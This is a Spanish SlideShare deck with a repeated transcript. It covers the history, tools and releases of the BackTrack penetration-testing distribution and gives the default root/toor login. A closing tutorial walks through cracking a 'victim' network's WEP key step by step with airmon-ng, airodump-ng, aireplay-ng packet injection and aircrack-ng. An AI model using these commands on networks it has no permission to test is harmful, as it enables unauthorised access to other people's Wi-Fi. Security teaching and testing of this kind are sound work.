SlideShare ist ein Scribd-Unternehmen logo
1 von 19
Downloaden Sie, um offline zu lesen
piratería por el gusto de hacerlo
proyectos
Acerca
BackTrack
Keykeriki v1.0 - 27MHz
Keykeriki v2.0 - 2.4GHz
Misc Investigación y Código
PrintFS
SuisseID y Debilidades NPA
enlaces
Principal
Acerca
modzero AG
Totalphase
entradas recientes
Content Transfer Hecho
Collected primera y dominios de nivel segundo
New Hosting, Diseño sencillo
The Apple IdiotenVektor (IV)
categorías
crypto (1) hardware (0) misc(1)
BackTrack
Principal
Historia
La distribución BackTrack originó a partir de la contraparte Linux WHax
y Auditor Colección Seguridad de Max Moser - "La navaja suiza de las
evaluaciones de seguridad". Tanto que se centró en las pruebas de
penetración basados en Linux. Mientras WHax estaba lleno con más
funciones, Auditor se basa en la estructura y la estabilidad. Auditor
aparece bien diseñados, los menús para su colección de más de 300
herramientas para la solución de problemas, la red y los sistemas de
fortificación. Su facilidad de uso se tradujo en una mayor facilidad de
uso para las pruebas de penetración, que llevó a la formulación de la
distribución de las pruebas de seguridad BackTrack. La Colección de
Seguridad Auditor era un Live CD basado en Knoppix.
WHax, un nombre derivado del sombrero blanco y SLAX, era una
distribución diseñada para tareas de seguridad. WHax surgió de
Whoppix, una distro de seguridad basado en Knoppix. Cuando Whoppix
llegó a la versión 3.0 fue rebautizado como WHax, para reflejar el
cambio de la distribución original de Knoppix para SLAX.Personalizada
por Mati Aharoni, un consultor de seguridad, WHax hizo su foco central
en las pruebas de penetración. WHax permitió probar y comprobar la
seguridad de una red de muchos ordenadores ubicados en distintos
lugares.
El primer lanzamiento real de BackTrack estaba disponible para el
público a principios del 2007. Fue un paso importante en el avance en
comparación con todas las demás pruebas de penetración de seguridad
distros disponibles. A través de los años y las versiones del distro se
convirtió en la norma como pruebas de penetración kit de herramientas
por todo el mundo. Grandes empresas como SANS, o incluso el FBI,
donde el uso del CD-ROM como base para su trabajo. La demanda de
este tipo de herramienta de la suite era inmensa. Suelte "pre-4" se ha
descargado más de 4'000'000 veces. Los canales de IRC y también el
correo electrónico y las entradas Foro se hicieron más grandes y
lager. La comunidad llegó a ser tan grande que Backtrack necesita
mucha ayuda de la comunidad.
Ahora, a principios de los años 2010 BackTrack encuentra de nuevo un
cambio importante ......
En tanto, BackTrack!
Como probablemente ya notado más famosa distribución de Linux la
seguridad del mundo tiene un nuevo hogar: http://www.backtrack-
linux.org .
Sí, lo hicimos, y sí, fue muy divertido! Pero como todo lo bueno en la
vida también BackTrack y Remote-Exploit.org han cambiado. La
comunidad alrededor de BackTrack ha crecido y nuevos, pequeños
desarrolladores, junto con uno de los fundadores principales empujó la
distro en un ámbito más amplio, mientras que el equipo remoto Explotar
decidió volver a lo básico: La investigación y publicación de las nuevas
ideas y proyectos. ...
Regreso a la diversión!
ckTrack Linux
Bienvenido a Backtrack-Linux.org, hogar de los de más alto rating y aclamados de
seguridad de Linux de distribución hasta la fecha. BackTrack es un Linux basado
en pruebas de penetración arsenal que los profesionales de seguridad ayuda en la
capacidad de realizar evaluaciones en un entorno puramente nativa dedicada a la
piratería. Sin importar si usted está haciendo BackTrack que BackTrack instalar ,
arrancar desde un Live DVD o pendrive , la distribución de la penetración se ha
personalizado hasta el último paquete, la configuración del núcleo, la escritura y el
parche con el único propósito de la prueba de intrusión.
BackTrack 5 R3 Fecha de lanzamiento! 13 de agosto
2012
Se ve mejor en pantalla completa !
BackTrack es para todos los públicos a partir de los profesionales de la seguridad
con más experiencia a principios de los recién llegados a la seguridad de la
información de campo. BackTrack promueve una forma rápida y fácil de encontrar
y actualizar la mayor base de datos de seguridad de herramientas de recogida al
día. Nuestra comunidad de usuarios van desde los probadores de penetración de
expertos en el campo de seguridad de la información, las entidades
gubernamentales, tecnología de la información, los entusiastas de la seguridad, y
las personas nuevas a la comunidad de seguridad.
Evaluación de todos los sectores y niveles de habilidad nos permite desarrollar una
verdadera solución que se adapta a todo el mundo y supera con creces cualquier
cosa que se haya desarrollado tanto comercial como de libre acceso. El proyecto
está financiado por la Seguridad ofensivo . Ya sea que esté de hacking
inalámbrico, la explotación de los servidores, la realización de una aplicación
web de evaluación, el aprendizaje o la ingeniería social de un cliente, BackTrack es
la ventanilla única para todas sus necesidades de seguridad.
BackTrack
BackTrack
BackTrack 5 R2
Desarrollador
'Remote ExploitTexto en negrita'
Página web de BackTrack Linux
Información general
Modelo de desarrollo FOSS
Última versión estable 5 R3 (info)
13 de agosto de 2012; hace 11 meses
Núcleo Linux
Tipo de núcleo Monolítico
Interfaz gráfica por defecto KDE , GNOME
Plataformas soportadas x86, x86-64, ARM(GNOME)
Sistema de gestión de
paquetes
Synaptic
Licencia Varias
Estado actual En desarrollo
Idiomas Multilingüe (Instalación)
En español
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de
seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran
popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.
Se deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.
WHAX es la evolución del Whoppix (WhiteHat Knoppix), el cual pasó a basarse en la distribución
Linux SLAX en lugar de Knoppix. La última versión de esta distribución cambió el sistema base, antes
basado en Slax y ahora en Ubuntu.1
Incluye una larga lista de herramientas de seguridad listas para usar, entre las que destacan
numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de
análisis forense y herramientas para la auditoría Wireless. Fue incluida en el puesto 7 de la famosa
lista "Top 100 Network Security Tools" de 2006.2
Índice
[ocultar]
1 Whoppix y WHAX
2 Herramientas
3 Versiones publicadas
4 BackTrack 5
5 Referencias
6 Véase también
7 Enlaces externos
Whoppix y WHAX[editar]
Whoppix es una distribución Live de linux que nació con la intención de proporcionar un entorno
unificado para la auditoría de seguridad. Su nombre deriva de White Hat Knoppix. La última versión
antes de convertirse en WHAX (White Hat Slax), fue la 2.7
WHAX está pensado para pruebas de seguridad y penetración de sistemas. Posee las últimas versiones
de varias herramientas de seguridad. El cambio de nombre se debe a la migración del sistema base,
originalmente Knoppix, ahora SLAX.
Herramientas[editar]
Backtrack le ofrece al usuario una extensa colección de herramientas completamente usables desde
un Live CD o un Live USB por lo que no requiere una instalación para poder usarse. O bien, se ofrece la
opción de instalar en un disco duro. Entre las herramientas ofrecidas se encuentran:
Aircrack-ng, Herramientas para auditoría inalámbrica
Kismet, Sniffer inalámbrico
Ettercap, Interceptor/Sniffer/Registrador para LAN
Wireshark, Analizador de protocolos
Medusa, herramienta para Ataque de fuerza bruta
Nmap, rastreador de puertos
Y una larga lista de otras herramientas, que se agrupan en 11 familias:
Recopilación de Información
Mapeo de Puertos
Identificación de Vulnerabilidades
Análisis de aplicaciones Web
Análisis de redes de radio (WiFi, Bluetooth, RFID)
Penetración (Exploits y Kit de herramientas de ingeniería social)
Escalada de privilegios
Mantenimiento de Acceso
Forenses
Ingeniería inversa
Voz sobre IP
Cabe destacar que siempre se le pueden añadir mas herramientas y software libre para desarrolladores
de programación, herramientas de oficina, etc. Que originalmente no trae Backtrack, por otro lado
también los creadores de esta distro pueden personalizar a gusto el backtrack.
BackTrack 5[editar]
El nombre código del lanzamiento es "revolution", pues da lugar a una serie de cambios muy
importantes dentro de la distribución. BackTrack 5 está basado en Ubuntu 10.04 LTS (Lucyd Lynx)
y, por primera vez, ofrece soporte para arquitecturas de 32 y 64 bits, algo nuevo en la distribución,
pues, hasta ahora, se había lanzado exclusivamente la versión de 32 bits.
Es oficialmente soportado el entorno de escritorio KDE 4, Gnome y Fluxbox, lo que permite al
usuario descargar la edición con el entorno de escritorio de su preferencia.
Es también la primera versión de BackTrack que incluye el código fuente completo dentro de sus
repositorios, aclarando así cualquier problema de licencias que se haya presentado en BackTrack
4.
Se ha refrescado por completo la lista de herramientas que se incluyen en la nueva versión, y se
han ido agregando más herramientas a los repositorios oficiales. También hay una sección en la
página oficial para hacer sugerencias para incluir herramientas nuevas.
4
El lanzamiento de ésta nueva versión tuvo lugar el 10 de mayo de 2011.
BackTrack 5 R3 Final ha sido puesto en libertad, la version R3 se centra en la correcciones de
errores, así como la adición de más de 60 nuevas herramientas - varios de los cuales fueron
puestos en libertad en el BlackHat y la Defcon 2012. Toda una categoría nueva herramienta -
“Physical Exploitation”, que ahora incluye herramientas tales como el IDE de Arduino y bibliotecas,
así como la recolección de Kautilya Teensy payload collection-----
El lanzamiento de ésta nueva versión tuvo lugar el 13/08/2012-----
BackTrack es una de las más conocidas y apreciadas distribuciones GNU/Linux orientadas
a profesionales de la seguridad, con un enfoque especial hacia la realización de tests de
penetración. Para dar una idea de su popularidad, baste decir que ocupa el puesto 32 en
el famoso ránking de Insecure.org.
Se presenta como un LiveCD (por lo que ni siquiera necesita instalación) que proporciona
en un par de minutos acceso a más de 300 herramientas de todo tipo (sniffers, exploits,
auditoría wireless, análisis forense, etc) perfectamente organizadas. Por lo demás
BackTrack incorpora también todas utilidades habituales en cualquier distribución al uso...
La versión 2 (recién publicada) utiliza un kernel 2.6.20 con varios parches e incluye
soporte para tarjetas inalámbricas Broadcom. Integra Metasploit 2 y 3.
Puesto que hace muy poco presentábamos por aquí DVL, otra distribución dirigida al
aprendizaje de la (in)seguridad informática, se hace necesario establecer de antemano la
principal diferencia entre ambas. Baste decir que DVL -además de ser insegura por
defecto- va claramente dirigida a entornos de aprendizaje (con profusión de tutoriales,
etc), mientras que BackTrack es mucho más completa y potente, pero está enfocada a
profesionales de la seguridad o al menos gente con buenos conocimientos. Aunque he de
suponer en nuestros lectores la madurez necesaria, no estará de más recordar nuestro
lema al respecto: los experimentos siempre en casa y con gaseosa. Cuidadín, que
BackTrack tiene mucho poderío y te puede explotar en las manos.
Aunque en la web de BackTrack se insinúa la próxima liberación de máquinas virtuales
para VMware, Kriptópolis se ha adelantado y he creado una máquina virtual desde VMWare
Workstation a partir de la ISO descargada (casi 700 MB).
Como siempre, este juego de pantallas trata de mostrar -a grandes rasgos- lo que se
encontrará el usuario que se aventure en BackTrack.
Arrancando BackTrack:
Llegamos al login. Deberemos emplear root como nombre de usuario y toor como
contraseña. Una vez logueados, teclearemosstartx para acceder a un escritorio KDE o
bien flux si optamos por FluxBox. Arrancaremos KDE:
Mientras arranca KDE ya vemos que el diseño es sobrio pero agradable y muy cuidado:
Así luce el escritorio de BackTrack2 sin desplegar ningún menú:
Vamos a desplegar algún menú a modo de ejemplo. Por ejemplo el titulado BackTrack,
que es donde se encuentra todo el meollo de esta distro. Por ejemplo, esta es la opción de
herramientas misceláneas:
Sólo con echar un vistazo al resto de menúes de la imagen anterior ya os podéis imaginar
lo que dan de sí más de 300 herramientas.
Así luce Metasploit, la bestia parda, perfectamente configurado y en marcha:
Sí; si te has fijado en la esquina inferior derecha de la imagen anterior, BackTrack incluye
también un Firefox 2.0.0.2 "torificado".
En fin; espero haberos despertado el interés por esta magnífica distribución. Dejo a
vuestro cargo seguir explorando sus posibilidades. Yo, de momento, salgo de KDE,
tecleo halt y cierro el kiosco:
Aclaración;"Este post es con fines Educativos y/o Didácticos, no me
hago responsable del uso malicioso"
Para emplear todo este proceso necesitas tener una interfaz de red
inalámbrica (Wifi).
Tener BackTrack 5 :No me digas: y un poco de conocimiento en
GNU/Linux (saber usar la Terminal)
Descarga Personalizada
Primero vamos a la pagina de descarga de BackTrack 5
BackTrack Download
Descarga Personalizada
Escojan versión: Yo elegí Backtrack 5 R3
Windows Manager (manejador de vetanas): Yo elegí gnome, ya que para mi
es mas cómodo
Escojan su arquitectura: Mi arquitectura es de 32bits
Tipo de Imagen: ISO (100% Recomendable)
Tipo de descarga: Directo (Descarga Directa)
Nota la ISO pesa mas de 3Gb así que si y tienes una conexión lenta descarga el
torrent para descargarlo en 2 días como máximo con el programa Utorrent
Descarga Directa, Si tienes una buena conexión
Backtrack 32 bits 3,3Gb
BackTrack 64 bits 3.1Gb
Booteamos Backtrack 5
USB Mínimo 4 Gb
DVD Mínimo 4.7 Gb
Programa para bootear en una Pendrive
Pueden usar linuxLiveUSB Home LinuxLiveUsb
o UNetbootin Home UNetbooting
Yo usaré UNetbooting
Download
Un Pequeño MiniTuto
1.- Aquí escogerán la distribución a instalar, en este caso es BackTrack 5.
2.- Elegirán la versión de la distribución.
3.- Selecciona la ruta donde se encuentra la imagen ISO de BackTrack 5.
4.- Selecciona el tipo de unidad, puede ser un Pendrive o un Disco duro.
5.- Selecciona la letra de la unidad.
6.- Esta opción se seleccionara automáticamente al hacer todo bien.
7.- Ahora dan clic en aceptar y comenzara la instalación en la memoria,
después de unos minutos el proceso terminara y ya podemos ejecutar
el Backtrack 5 desde una Memoria USB.
Programa para bootear en una DVD
Usen nero 9 algo parecido, ustedes sabrán
Ahora si empezemos
1. Paso: Saber el nombre de nuestra interface (Targeta Wireless) para colocar en
Modo Monitor, para esto abrimos una terminal y escribimos lo siguiente:
Cita: Ocultar
airmon-ng
Y nos aparecerá el nombre de nuestra interfaz, el chipset y el driver en mi caso es
una el nombre de la interfaz es Wlan0
2. Paso: Ya qué conocemos el nombre de nuestra interfaz procedemos a ponerla
en Modo Monitor y escribimos lo siguiente:
Cita: Ocultar
airmon-ng start wlan0
Ya tenemos nuestra targeta en Modo Monitor (monitor mode enabled on mon0) se
podrán dar cuenta "mon0" es el nombre de la interfaz en modo monitor.
3. Paso: Ahora vamos a escanear redes disponibles con el siguiente comando:
Cita: Ocultar
airodump-ng mon0
y con esto comenzará a mostrarnos las Redes Disponibles. Para seleccionar la
Red Víctima tenemos qué detener el escaneo presionando ctrl+c
4. Paso: En este paso vamos a Capturar la Red Víctima para esto escribimos el
siguiente comando:
Cita: Ocultar
airodump-ng -w redes -c 11 --bssid 00:22:A4:30:FE:59 mon0
donde
-w = especifica el nombre del archivo donde se guarda la captura de datos
-c = especifica el canal de la Red
--bssid = especifica Mac de Punto de Acceso
mon0 = especifica la interfaz de la targeta de Red en Modo Monitor
5. Paso: Abrimos una segunda Terminal (sin cerrar la primera) y escribimos lo
siguiente:
Cita: Ocultar
aireplay-ng -1 0 -a 00:22:A4:30:FE:59 mon0
esto es para Asociar su pc con la Red Víctima
6. Paso: Ahora si viene lo bueno, a inyectar paquetes a la red, para esto
tecleamos lo siguiente:
Cita: Ocultar
aireplay-ng -3 -b 00:22:A4:30:FE:59 mon0
con esto enviaremos y recibiremos paquetes. Vamos a la primera Terminal y en la
columna #Data se incrementará rapidamente, y esperamos a que llegue a
los 30,000 datos para poder desemcriptar la Clave
7. Paso: Cuando llegue a los 30,000 datos abrimos una tercera y última Terminal y
escribimos el famoso comando:
Cita: Ocultar
aircrack-ng redes-01.cap
redes =archivo donde se guarda la captura (.cap) el mismo qué mencionamos en
el paso 3
damos enter y empezará a decifrar a la clave y Vualá Clave desemcriptada
Cita: Ocultar
Key Found¡ (09:86:23:47:63)
Y en dado caso de qué no entiendan un carajo¡ ahi les dejo 2 Vídeos
- See more at: http://www.identi.li/index.php?topic=117891#sthash.ieDDud00.dpuf
¡A disfrutar!
BackTrack

Weitere ähnliche Inhalte

Was ist angesagt? (20)

Presentación xanadu ponencia flisol amazonas 2016
Presentación xanadu ponencia flisol amazonas 2016Presentación xanadu ponencia flisol amazonas 2016
Presentación xanadu ponencia flisol amazonas 2016
 
Linux papito
Linux papitoLinux papito
Linux papito
 
Taller de Instalación, configuración y mantenimiento básico de gnu/linux
Taller de Instalación, configuración y mantenimiento básico de gnu/linuxTaller de Instalación, configuración y mantenimiento básico de gnu/linux
Taller de Instalación, configuración y mantenimiento básico de gnu/linux
 
Linux!!
Linux!!Linux!!
Linux!!
 
Arch linux
Arch linuxArch linux
Arch linux
 
Cois 408 Informe Oral
Cois 408 Informe OralCois 408 Informe Oral
Cois 408 Informe Oral
 
Linux windows nieva
Linux windows nievaLinux windows nieva
Linux windows nieva
 
Presentacion ubuntu 20.04
Presentacion ubuntu 20.04Presentacion ubuntu 20.04
Presentacion ubuntu 20.04
 
Taller de Instalación y configuración de gnu/linux
Taller de Instalación y configuración de gnu/linuxTaller de Instalación y configuración de gnu/linux
Taller de Instalación y configuración de gnu/linux
 
Linux
LinuxLinux
Linux
 
Sistema operativo linux
Sistema operativo linuxSistema operativo linux
Sistema operativo linux
 
Sistema operativo linux
Sistema operativo linuxSistema operativo linux
Sistema operativo linux
 
Dimuro
DimuroDimuro
Dimuro
 
Lpic linux
Lpic linux Lpic linux
Lpic linux
 
Sistemas operativos2
Sistemas operativos2Sistemas operativos2
Sistemas operativos2
 
Manjaro Linux
Manjaro LinuxManjaro Linux
Manjaro Linux
 
Tema a tratarse
Tema a tratarseTema a tratarse
Tema a tratarse
 
Red hat jose miguel_suarez_villa
Red hat jose miguel_suarez_villaRed hat jose miguel_suarez_villa
Red hat jose miguel_suarez_villa
 
So linux
So linuxSo linux
So linux
 
Red Hat Enterprise Linux 5
Red Hat Enterprise Linux 5Red Hat Enterprise Linux 5
Red Hat Enterprise Linux 5
 

Ähnlich wie Backtrack

Suites de auditorias informáticas
Suites de auditorias informáticasSuites de auditorias informáticas
Suites de auditorias informáticasTensor
 
Suites de auditorias informáticas
Suites de auditorias informáticasSuites de auditorias informáticas
Suites de auditorias informáticasTensor
 
Suites de auditorias informáticas
Suites de auditorias informáticasSuites de auditorias informáticas
Suites de auditorias informáticasTensor
 
Suites de auditorias informáticas
Suites de auditorias informáticasSuites de auditorias informáticas
Suites de auditorias informáticasTensor
 
Suites de auditorias informáticas
Suites de auditorias informáticasSuites de auditorias informáticas
Suites de auditorias informáticasTensor
 
Sistemas Operativos.
Sistemas Operativos.Sistemas Operativos.
Sistemas Operativos.Cecilia Ortiz
 
Sistemas Operativos
Sistemas OperativosSistemas Operativos
Sistemas OperativosKarii B-v
 
sistemas operativos
sistemas operativossistemas operativos
sistemas operativossusynava1205
 
sistemas operativos
sistemas operativossistemas operativos
sistemas operativosbrayanton
 
SISTEMAS OPERATIVOS
SISTEMAS OPERATIVOSSISTEMAS OPERATIVOS
SISTEMAS OPERATIVOSbrayanton
 
9.distribuciones linux
9.distribuciones linux9.distribuciones linux
9.distribuciones linuxArleth Beta
 
Historia de linux y sus distribuciones
Historia de linux y sus distribucionesHistoria de linux y sus distribuciones
Historia de linux y sus distribucionessaraelizabethgutierrez
 
Rae introducción a backtrack 5
Rae introducción a backtrack 5Rae introducción a backtrack 5
Rae introducción a backtrack 5Jeison Candamil
 
Introducción a OpenSolaris 2009.06 y a ZFS
Introducción a OpenSolaris 2009.06 y a ZFSIntroducción a OpenSolaris 2009.06 y a ZFS
Introducción a OpenSolaris 2009.06 y a ZFSjuandanielp
 

Ähnlich wie Backtrack (20)

Suites de auditorias informáticas
Suites de auditorias informáticasSuites de auditorias informáticas
Suites de auditorias informáticas
 
Suites de auditorias informáticas
Suites de auditorias informáticasSuites de auditorias informáticas
Suites de auditorias informáticas
 
Suites de auditorias informáticas
Suites de auditorias informáticasSuites de auditorias informáticas
Suites de auditorias informáticas
 
Suites de auditorias informáticas
Suites de auditorias informáticasSuites de auditorias informáticas
Suites de auditorias informáticas
 
Suites de auditorias informáticas
Suites de auditorias informáticasSuites de auditorias informáticas
Suites de auditorias informáticas
 
Sistemas Operativos.
Sistemas Operativos.Sistemas Operativos.
Sistemas Operativos.
 
Sistemas Operativos
Sistemas OperativosSistemas Operativos
Sistemas Operativos
 
sistemas operativos
sistemas operativossistemas operativos
sistemas operativos
 
sistemas operativos
sistemas operativossistemas operativos
sistemas operativos
 
SISTEMAS OPERATIVOS
SISTEMAS OPERATIVOSSISTEMAS OPERATIVOS
SISTEMAS OPERATIVOS
 
Milena maria munera berruecos
Milena maria munera berruecosMilena maria munera berruecos
Milena maria munera berruecos
 
9.distribuciones linux
9.distribuciones linux9.distribuciones linux
9.distribuciones linux
 
Historia de linux y sus distribuciones
Historia de linux y sus distribucionesHistoria de linux y sus distribuciones
Historia de linux y sus distribuciones
 
S.o
S.oS.o
S.o
 
S.o linux
S.o linuxS.o linux
S.o linux
 
Rae introducción a backtrack 5
Rae introducción a backtrack 5Rae introducción a backtrack 5
Rae introducción a backtrack 5
 
Red hat
Red hatRed hat
Red hat
 
Introducción a OpenSolaris 2009.06 y a ZFS
Introducción a OpenSolaris 2009.06 y a ZFSIntroducción a OpenSolaris 2009.06 y a ZFS
Introducción a OpenSolaris 2009.06 y a ZFS
 
Kalilinux
KalilinuxKalilinux
Kalilinux
 
Sistemas Operativos
Sistemas OperativosSistemas Operativos
Sistemas Operativos
 

Backtrack

  • 1. piratería por el gusto de hacerlo proyectos Acerca BackTrack Keykeriki v1.0 - 27MHz Keykeriki v2.0 - 2.4GHz Misc Investigación y Código PrintFS SuisseID y Debilidades NPA enlaces Principal Acerca modzero AG Totalphase entradas recientes Content Transfer Hecho Collected primera y dominios de nivel segundo New Hosting, Diseño sencillo The Apple IdiotenVektor (IV) categorías crypto (1) hardware (0) misc(1) BackTrack Principal Historia
  • 2. La distribución BackTrack originó a partir de la contraparte Linux WHax y Auditor Colección Seguridad de Max Moser - "La navaja suiza de las evaluaciones de seguridad". Tanto que se centró en las pruebas de penetración basados en Linux. Mientras WHax estaba lleno con más funciones, Auditor se basa en la estructura y la estabilidad. Auditor aparece bien diseñados, los menús para su colección de más de 300 herramientas para la solución de problemas, la red y los sistemas de fortificación. Su facilidad de uso se tradujo en una mayor facilidad de uso para las pruebas de penetración, que llevó a la formulación de la distribución de las pruebas de seguridad BackTrack. La Colección de Seguridad Auditor era un Live CD basado en Knoppix. WHax, un nombre derivado del sombrero blanco y SLAX, era una distribución diseñada para tareas de seguridad. WHax surgió de Whoppix, una distro de seguridad basado en Knoppix. Cuando Whoppix llegó a la versión 3.0 fue rebautizado como WHax, para reflejar el cambio de la distribución original de Knoppix para SLAX.Personalizada por Mati Aharoni, un consultor de seguridad, WHax hizo su foco central en las pruebas de penetración. WHax permitió probar y comprobar la seguridad de una red de muchos ordenadores ubicados en distintos lugares. El primer lanzamiento real de BackTrack estaba disponible para el público a principios del 2007. Fue un paso importante en el avance en comparación con todas las demás pruebas de penetración de seguridad distros disponibles. A través de los años y las versiones del distro se convirtió en la norma como pruebas de penetración kit de herramientas por todo el mundo. Grandes empresas como SANS, o incluso el FBI, donde el uso del CD-ROM como base para su trabajo. La demanda de este tipo de herramienta de la suite era inmensa. Suelte "pre-4" se ha descargado más de 4'000'000 veces. Los canales de IRC y también el correo electrónico y las entradas Foro se hicieron más grandes y lager. La comunidad llegó a ser tan grande que Backtrack necesita mucha ayuda de la comunidad. Ahora, a principios de los años 2010 BackTrack encuentra de nuevo un cambio importante ...... En tanto, BackTrack!
  • 3. Como probablemente ya notado más famosa distribución de Linux la seguridad del mundo tiene un nuevo hogar: http://www.backtrack- linux.org . Sí, lo hicimos, y sí, fue muy divertido! Pero como todo lo bueno en la vida también BackTrack y Remote-Exploit.org han cambiado. La comunidad alrededor de BackTrack ha crecido y nuevos, pequeños desarrolladores, junto con uno de los fundadores principales empujó la distro en un ámbito más amplio, mientras que el equipo remoto Explotar decidió volver a lo básico: La investigación y publicación de las nuevas ideas y proyectos. ... Regreso a la diversión! ckTrack Linux Bienvenido a Backtrack-Linux.org, hogar de los de más alto rating y aclamados de seguridad de Linux de distribución hasta la fecha. BackTrack es un Linux basado en pruebas de penetración arsenal que los profesionales de seguridad ayuda en la capacidad de realizar evaluaciones en un entorno puramente nativa dedicada a la piratería. Sin importar si usted está haciendo BackTrack que BackTrack instalar , arrancar desde un Live DVD o pendrive , la distribución de la penetración se ha
  • 4. personalizado hasta el último paquete, la configuración del núcleo, la escritura y el parche con el único propósito de la prueba de intrusión. BackTrack 5 R3 Fecha de lanzamiento! 13 de agosto 2012 Se ve mejor en pantalla completa ! BackTrack es para todos los públicos a partir de los profesionales de la seguridad con más experiencia a principios de los recién llegados a la seguridad de la información de campo. BackTrack promueve una forma rápida y fácil de encontrar y actualizar la mayor base de datos de seguridad de herramientas de recogida al día. Nuestra comunidad de usuarios van desde los probadores de penetración de expertos en el campo de seguridad de la información, las entidades gubernamentales, tecnología de la información, los entusiastas de la seguridad, y las personas nuevas a la comunidad de seguridad. Evaluación de todos los sectores y niveles de habilidad nos permite desarrollar una verdadera solución que se adapta a todo el mundo y supera con creces cualquier cosa que se haya desarrollado tanto comercial como de libre acceso. El proyecto está financiado por la Seguridad ofensivo . Ya sea que esté de hacking inalámbrico, la explotación de los servidores, la realización de una aplicación web de evaluación, el aprendizaje o la ingeniería social de un cliente, BackTrack es la ventanilla única para todas sus necesidades de seguridad. BackTrack BackTrack
  • 5. BackTrack 5 R2 Desarrollador 'Remote ExploitTexto en negrita' Página web de BackTrack Linux Información general Modelo de desarrollo FOSS Última versión estable 5 R3 (info) 13 de agosto de 2012; hace 11 meses Núcleo Linux Tipo de núcleo Monolítico Interfaz gráfica por defecto KDE , GNOME Plataformas soportadas x86, x86-64, ARM(GNOME) Sistema de gestión de paquetes Synaptic
  • 6. Licencia Varias Estado actual En desarrollo Idiomas Multilingüe (Instalación) En español BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática. Se deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX. WHAX es la evolución del Whoppix (WhiteHat Knoppix), el cual pasó a basarse en la distribución Linux SLAX en lugar de Knoppix. La última versión de esta distribución cambió el sistema base, antes basado en Slax y ahora en Ubuntu.1 Incluye una larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless. Fue incluida en el puesto 7 de la famosa lista "Top 100 Network Security Tools" de 2006.2 Índice [ocultar] 1 Whoppix y WHAX 2 Herramientas 3 Versiones publicadas 4 BackTrack 5 5 Referencias 6 Véase también 7 Enlaces externos Whoppix y WHAX[editar] Whoppix es una distribución Live de linux que nació con la intención de proporcionar un entorno unificado para la auditoría de seguridad. Su nombre deriva de White Hat Knoppix. La última versión antes de convertirse en WHAX (White Hat Slax), fue la 2.7
  • 7. WHAX está pensado para pruebas de seguridad y penetración de sistemas. Posee las últimas versiones de varias herramientas de seguridad. El cambio de nombre se debe a la migración del sistema base, originalmente Knoppix, ahora SLAX. Herramientas[editar] Backtrack le ofrece al usuario una extensa colección de herramientas completamente usables desde un Live CD o un Live USB por lo que no requiere una instalación para poder usarse. O bien, se ofrece la opción de instalar en un disco duro. Entre las herramientas ofrecidas se encuentran: Aircrack-ng, Herramientas para auditoría inalámbrica Kismet, Sniffer inalámbrico Ettercap, Interceptor/Sniffer/Registrador para LAN Wireshark, Analizador de protocolos Medusa, herramienta para Ataque de fuerza bruta Nmap, rastreador de puertos Y una larga lista de otras herramientas, que se agrupan en 11 familias: Recopilación de Información Mapeo de Puertos Identificación de Vulnerabilidades Análisis de aplicaciones Web Análisis de redes de radio (WiFi, Bluetooth, RFID) Penetración (Exploits y Kit de herramientas de ingeniería social) Escalada de privilegios Mantenimiento de Acceso Forenses Ingeniería inversa Voz sobre IP Cabe destacar que siempre se le pueden añadir mas herramientas y software libre para desarrolladores de programación, herramientas de oficina, etc. Que originalmente no trae Backtrack, por otro lado también los creadores de esta distro pueden personalizar a gusto el backtrack. BackTrack 5[editar] El nombre código del lanzamiento es "revolution", pues da lugar a una serie de cambios muy importantes dentro de la distribución. BackTrack 5 está basado en Ubuntu 10.04 LTS (Lucyd Lynx)
  • 8. y, por primera vez, ofrece soporte para arquitecturas de 32 y 64 bits, algo nuevo en la distribución, pues, hasta ahora, se había lanzado exclusivamente la versión de 32 bits. Es oficialmente soportado el entorno de escritorio KDE 4, Gnome y Fluxbox, lo que permite al usuario descargar la edición con el entorno de escritorio de su preferencia. Es también la primera versión de BackTrack que incluye el código fuente completo dentro de sus repositorios, aclarando así cualquier problema de licencias que se haya presentado en BackTrack 4. Se ha refrescado por completo la lista de herramientas que se incluyen en la nueva versión, y se han ido agregando más herramientas a los repositorios oficiales. También hay una sección en la página oficial para hacer sugerencias para incluir herramientas nuevas. 4 El lanzamiento de ésta nueva versión tuvo lugar el 10 de mayo de 2011. BackTrack 5 R3 Final ha sido puesto en libertad, la version R3 se centra en la correcciones de errores, así como la adición de más de 60 nuevas herramientas - varios de los cuales fueron puestos en libertad en el BlackHat y la Defcon 2012. Toda una categoría nueva herramienta - “Physical Exploitation”, que ahora incluye herramientas tales como el IDE de Arduino y bibliotecas, así como la recolección de Kautilya Teensy payload collection----- El lanzamiento de ésta nueva versión tuvo lugar el 13/08/2012----- BackTrack es una de las más conocidas y apreciadas distribuciones GNU/Linux orientadas a profesionales de la seguridad, con un enfoque especial hacia la realización de tests de penetración. Para dar una idea de su popularidad, baste decir que ocupa el puesto 32 en el famoso ránking de Insecure.org.
  • 9. Se presenta como un LiveCD (por lo que ni siquiera necesita instalación) que proporciona en un par de minutos acceso a más de 300 herramientas de todo tipo (sniffers, exploits, auditoría wireless, análisis forense, etc) perfectamente organizadas. Por lo demás BackTrack incorpora también todas utilidades habituales en cualquier distribución al uso... La versión 2 (recién publicada) utiliza un kernel 2.6.20 con varios parches e incluye soporte para tarjetas inalámbricas Broadcom. Integra Metasploit 2 y 3. Puesto que hace muy poco presentábamos por aquí DVL, otra distribución dirigida al aprendizaje de la (in)seguridad informática, se hace necesario establecer de antemano la principal diferencia entre ambas. Baste decir que DVL -además de ser insegura por defecto- va claramente dirigida a entornos de aprendizaje (con profusión de tutoriales, etc), mientras que BackTrack es mucho más completa y potente, pero está enfocada a profesionales de la seguridad o al menos gente con buenos conocimientos. Aunque he de suponer en nuestros lectores la madurez necesaria, no estará de más recordar nuestro lema al respecto: los experimentos siempre en casa y con gaseosa. Cuidadín, que BackTrack tiene mucho poderío y te puede explotar en las manos. Aunque en la web de BackTrack se insinúa 